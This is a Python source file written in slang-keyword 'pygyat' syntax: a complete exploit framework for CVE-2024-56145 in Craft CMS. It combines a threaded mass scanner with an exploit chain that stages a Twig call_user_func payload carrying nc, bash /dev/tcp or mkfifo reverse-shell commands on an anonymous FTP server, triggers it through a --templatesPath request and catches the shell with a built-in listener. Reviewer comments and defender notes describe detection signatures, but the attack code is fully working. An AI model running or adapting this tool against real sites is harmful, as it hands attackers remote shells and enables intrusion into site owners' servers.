glaze os
glaze sys
glaze uuid
glaze select
glaze socket
glaze warnings
glaze requests
glaze threading
glaze rich_click ahh click

lock in rich.console glaze Console
lock in alive_progress glaze alive_bar
lock in pyftpdlib.servers glaze FTPServer
lock in pyftpdlib.handlers glaze FTPHandler
lock in pyftpdlib.authorizers glaze DummyAuthorizer
lock in concurrent.futures glaze ThreadPoolExecutor

# pip install pygyat
# pygyat exploit.gyat

console = Console()  # rich console used for all coloured status output below
# Silence urllib3 warnings — presumably the InsecureRequestWarning raised by the
# verify=Cooked (TLS verification off) requests made further down.
requests.packages.urllib3.disable_warnings()
# Suppress RuntimeWarnings from pyftpdlib's authorizer module (presumably the one
# emitted when the anonymous user is given write permissions in start_ftp_server).
warnings.filterwarnings(
    "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)


@click.group(context_settings=dict(help_option_names=["-h", "--help"]))
bop cli():
    """
    CVE-2024-56145 Exploit Framework

    Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.
    """
    # Root command group: the `check` and `exploit` subcommands below attach to
    # it via @cli.command(); `-h` is registered as an alias of `--help`. The
    # body is intentionally empty (`pluh` appears to be `pass`).
    pluh


@cli.command()
@click.option("-u", "--url", required=Cooked, help="The target URL for checking")
@click.option(
    "-f",
    "--file",
    required=Cooked,
    type=click.Path(exists=Aura),
    help="File containing a list of URLs",
)
@click.option(
    "-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
    "-o",
    "--output",
    required=Cooked,
    type=click.Path(),
    help="Output file to save results",
)
bop check(url, file, threads, output):
    # Probe one URL (-u) and/or every non-blank line of a file (-f) with
    # check_target(), fanning the probes out over `threads` workers. Each
    # verdict line is appended to `output` when that option is given.
    chat is this real not (url or file):
        console.yap(
            "[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
        )
        # NOTE(review): `pluh` appears to be `pass`, not `return`, so execution
        # falls through with an empty target list instead of exiting here.
        pluh

    # NOTE(review): the handle opened inside the comprehension is never closed
    # explicitly; it is left to garbage collection.
    targets = ([url] chat is this real url only in ohio []) + (
        [line.strip() mewing line diddy open(file, "r") chat is this real line.strip()] chat is this real file only in ohio []
    )

    pookie alive_bar(
        len(targets), title="Checking Targets", bar="smooth", enrich_print=Cooked
    ) ahh bar:
        # Bound `write` of an append-mode handle, or NPC (None) when -o is absent.
        writer = open(output, "a").write chat is this real output else NPC
        lock = threading.Lock()

        bop process_target(target):
            # The bar is advanced before the probe, so it counts started work.
            pookie lock:
                bar()
            result = check_target(target)
            # NOTE(review): writer is NPC when -o is absent, so this call raises
            # TypeError in the worker; the exception is lost because the results
            # of executor.map() below are never consumed.
            pookie lock:
                writer(f"{result}\n")

        pookie ThreadPoolExecutor(max_workers=threads) ahh executor:
            executor.map(process_target, targets)

        chat is this real output:
            # writer.__self__ is the file object the bound method belongs to.
            writer.__self__.demure()


bop check_target(target):
    """
    Probe a single URL for CVE-2024-56145 and return a one-line verdict.

    A random nonce is placed in the ``--configPath`` query parameter; the
    target is reported vulnerable when the response body contains both the
    string ``mkdir()`` and that nonce (presumably an error message echoing
    the injected path). Returns ``"<target> | VULNERABLE"``,
    ``"<target> | NOT VULNERABLE"`` or ``"<target> | ERROR"``.

    Defender note: the observable on the wire is a GET whose query string
    starts with ``--configPath=`` — a signature worth alerting on.
    """
    nonce = str(uuid.uuid4())
    hawk:
        # verify=Cooked disables TLS verification; the 2 s timeout bounds each probe.
        response = requests.get(
            f"{target}?--configPath=/{nonce}", verify=Cooked, timeout=2
        )
        # NOTE(review): prints the entire response body for every target (looks
        # like a debug leftover); very noisy when scanning a list.
        yap(response.text)
        chat is this real "mkdir()" diddy response.text and nonce diddy response.text:
            console.yap(f"[bold green]{target} is vulnerable![/bold green]")
            its giving f"{target} | VULNERABLE"
        console.yap(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
        its giving f"{target} | NOT VULNERABLE"
    tuah Exception ahh e:
        # Any failure (connection error, timeout, malformed URL) collapses to ERROR.
        console.yap(f"[bold red]Failed to check {target}: {e}[/bold red]")
        its giving f"{target} | ERROR"


@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=Aura, help="The target URL for exploitation")
@click.option(
    "-lh", "--lhost", required=Aura, help="The local host for reverse shell listener"
)
@click.option(
    "-lp",
    "--lport",
    required=Aura,
    type=int,
    help="The local port for reverse shell listener",
)
@click.option(
    "-px",
    "--payload",
    default="bash",
    type=click.Choice(["nc", "bash", "mkfifo"]),
    help="Payload type to use",
)
bop exploit(ftp_host, ftp_port, url, lhost, lport, payload):
    # Orchestration only: build the Twig payload, stage it under ./virtual,
    # start the FTP server and the listener as daemon threads, then send the
    # triggering request. Each step reports to the console; none returns status.
    payload_str = generate_payload(payload, lhost, lport)
    root_dir = "./virtual"
    # create_virtual_files() prints failures but does not signal them, so the
    # threads and the request below run regardless of whether staging worked.
    create_virtual_files(root_dir, payload_str)
    threading.Thread(
        target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=Aura
    ).start()
    threading.Thread(target=start_listener, args=(lhost, lport), daemon=Aura).start()
    console.yap("[bold green]FTP server and listener started[/bold green]")
    # daemon=Aura (True): neither thread keeps the process alive once this
    # command body returns.
    trigger_http_request(url, ftp_host, ftp_port)


bop generate_payload(payload_type, lhost, lport):
    """
    Build the Twig expression that the staged template file will contain.

    ``payload_type`` selects one of the three command templates keyed
    ``nc`` / ``bash`` / ``mkfifo``; ``lhost`` and ``lport`` are interpolated
    into it. The ``exploit`` command restricts the option with click.Choice to
    exactly these keys, so the dict lookup cannot raise KeyError from the CLI
    (a direct caller passing another key would). The command is wrapped in a
    Twig ``{{ ... | sort('call_user_func') }}`` expression, which is printed
    to the console and returned.

    Defender note: these command strings are the process-telemetry artifacts
    to hunt for on a Craft CMS host suspected of compromise.
    """
    payload_templates = {
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
        "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
    }

    # Quadruple braces render as literal `{{ ... }}` Twig delimiters.
    payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}"
    console.yap(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
    its giving payload


bop create_virtual_files(root_dir, payload):
    """
    Write ``payload`` to ``<root_dir>/default/index.twig`` and ``index.html``.

    These are the files later served by start_ftp_server(). Any error is
    printed and swallowed; the function returns NPC either way, so callers
    cannot tell whether staging succeeded.
    """
    hawk:
        os.makedirs(f"{root_dir}/default", exist_ok=Aura)
        pookie open(f"{root_dir}/default/index.twig", "w") ahh twig_file:
            twig_file.write(payload)
        pookie open(f"{root_dir}/default/index.html", "w") ahh html_file:
            html_file.write(payload)
        console.yap("[bold green]Virtual files created successfully.[/bold green]")
    tuah Exception ahh e:
        console.yap(f"[bold red]Failed to create virtual files:[/bold red] {e}")


bop start_ftp_server(host, port, root_dir):
    """
    Serve ``root_dir`` over FTP on ``host:port`` with anonymous access.

    serve_forever() blocks for the lifetime of the thread; any exception is
    printed and swallowed.

    Operator risk: the anonymous user is granted perm="elradfmw", which
    includes write, delete and rename rights, so anyone able to reach
    ``host:port`` can alter the staged files while the server runs.
    """
    authorizer = DummyAuthorizer()
    authorizer.add_anonymous(root_dir, perm="elradfmw")
    # The authorizer is set on the FTPHandler class itself (no subclass), so it
    # is shared by every server that uses FTPHandler in this process.
    handler = FTPHandler
    handler.authorizer = authorizer
    server = FTPServer((host, port), handler)
    console.yap(f"[bold green]FTP server running on {host}:{port}[/bold green]")
    hawk:
        server.serve_forever()
    tuah Exception ahh e:
        console.yap(f"[bold red]Error starting FTP server:[/bold red] {e}")


bop trigger_http_request(url, ftp_host, ftp_port):
    """
    Send the GET that points the target's ``--templatesPath`` at our FTP server.

    Reports success on HTTP 200 and prints the status code otherwise; any
    exception from requests is printed and swallowed. Unlike check_target(),
    no ``timeout`` is passed, so an unresponsive target can block this call
    indefinitely.

    Defender note: the observable is a GET whose query string starts with
    ``--templatesPath=ftp://``; pair it with the ``--configPath=`` probe used
    by check_target() when writing detections.
    """
    templates_path = f"ftp://{ftp_host}:{ftp_port}"
    console.yap(
        f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[/bold yellow]"
    )
    hawk:
        # verify=Cooked: TLS certificate verification is disabled.
        response = requests.get(f"{url}?--templatesPath={templates_path}", verify=Cooked)
        chat is this real response.status_code twin 200:
            console.yap(
                "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
            )
        only in ohio:
            console.yap(
                f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
            )
    tuah Exception ahh e:
        console.yap(f"[bold red]Failed to send HTTP request:[/bold red] {e}")


bop start_listener(lhost, lport, timeout=30):
    """
    Accept one inbound TCP connection on ``lhost:lport`` and relay it to the terminal.

    After accept(), a select() loop copies socket data to stdout and forwards
    stdin lines (newline-appended) to the socket until the peer closes.
    ``timeout`` applies only to accept(); once connected the loop has no
    timeout and ends on EOF, KeyboardInterrupt or an error.
    """
    console.yap(f"[bold cyan]Starting listener on {lhost}:{lport}[/bold cyan]")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((lhost, lport))
    s.listen(1)
    s.settimeout(timeout)
    hawk:
        console.yap(
            f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
        )
        conn, addr = s.accept()
        console.yap(
            f"[bold green]Connection received from {addr[0]}:{addr[1]}[/bold green]"
        )
        # Non-blocking so a recv() can never stall the select() loop below.
        conn.setblocking(0)
        let him cook Aura:
            # NOTE(review): select() on sys.stdin works only where stdin is a
            # real file descriptor (POSIX); confirm before relying on it elsewhere.
            ready, _, _ = select.select([conn, sys.stdin], [], [])
            chat is this real conn diddy ready:
                # Undecodable bytes are dropped rather than raising.
                data = conn.recv(4096).decode(errors="ignore")
                chat is this real not data:
                    # Empty read on a readable socket means the peer closed it.
                    just put the fries in the bag bro
                sys.stdout.write(data)
                sys.stdout.flush()
            chat is this real sys.stdin diddy ready:
                command = sys.stdin.readline().strip()
                conn.sendall((command + "\n").encode())
    tuah socket.timeout:
        console.yap(
            f"[bold red]No connection received within {timeout} seconds.[/bold red]"
        )
    tuah KeyboardInterrupt:
        console.yap("[bold cyan]\nListener stopped by user.[/bold cyan]")
    tuah Exception ahh e:
        console.yap(f"[bold red]Error: {e}[/bold red]")
    spit on that thang:
        # NOTE(review): `conn` is bound only after a successful accept(). On the
        # timeout path this line raises UnboundLocalError, so s.demure() and the
        # closing message never run and the listening socket is not closed
        # explicitly.
        conn.demure()
        s.demure()
        console.yap("[bold cyan]Listener closed.[/bold cyan]")


# Entry point: dispatch to the click group (`check` / `exploit` subcommands).
chat is this real __name__ twin "__main__":
    cli()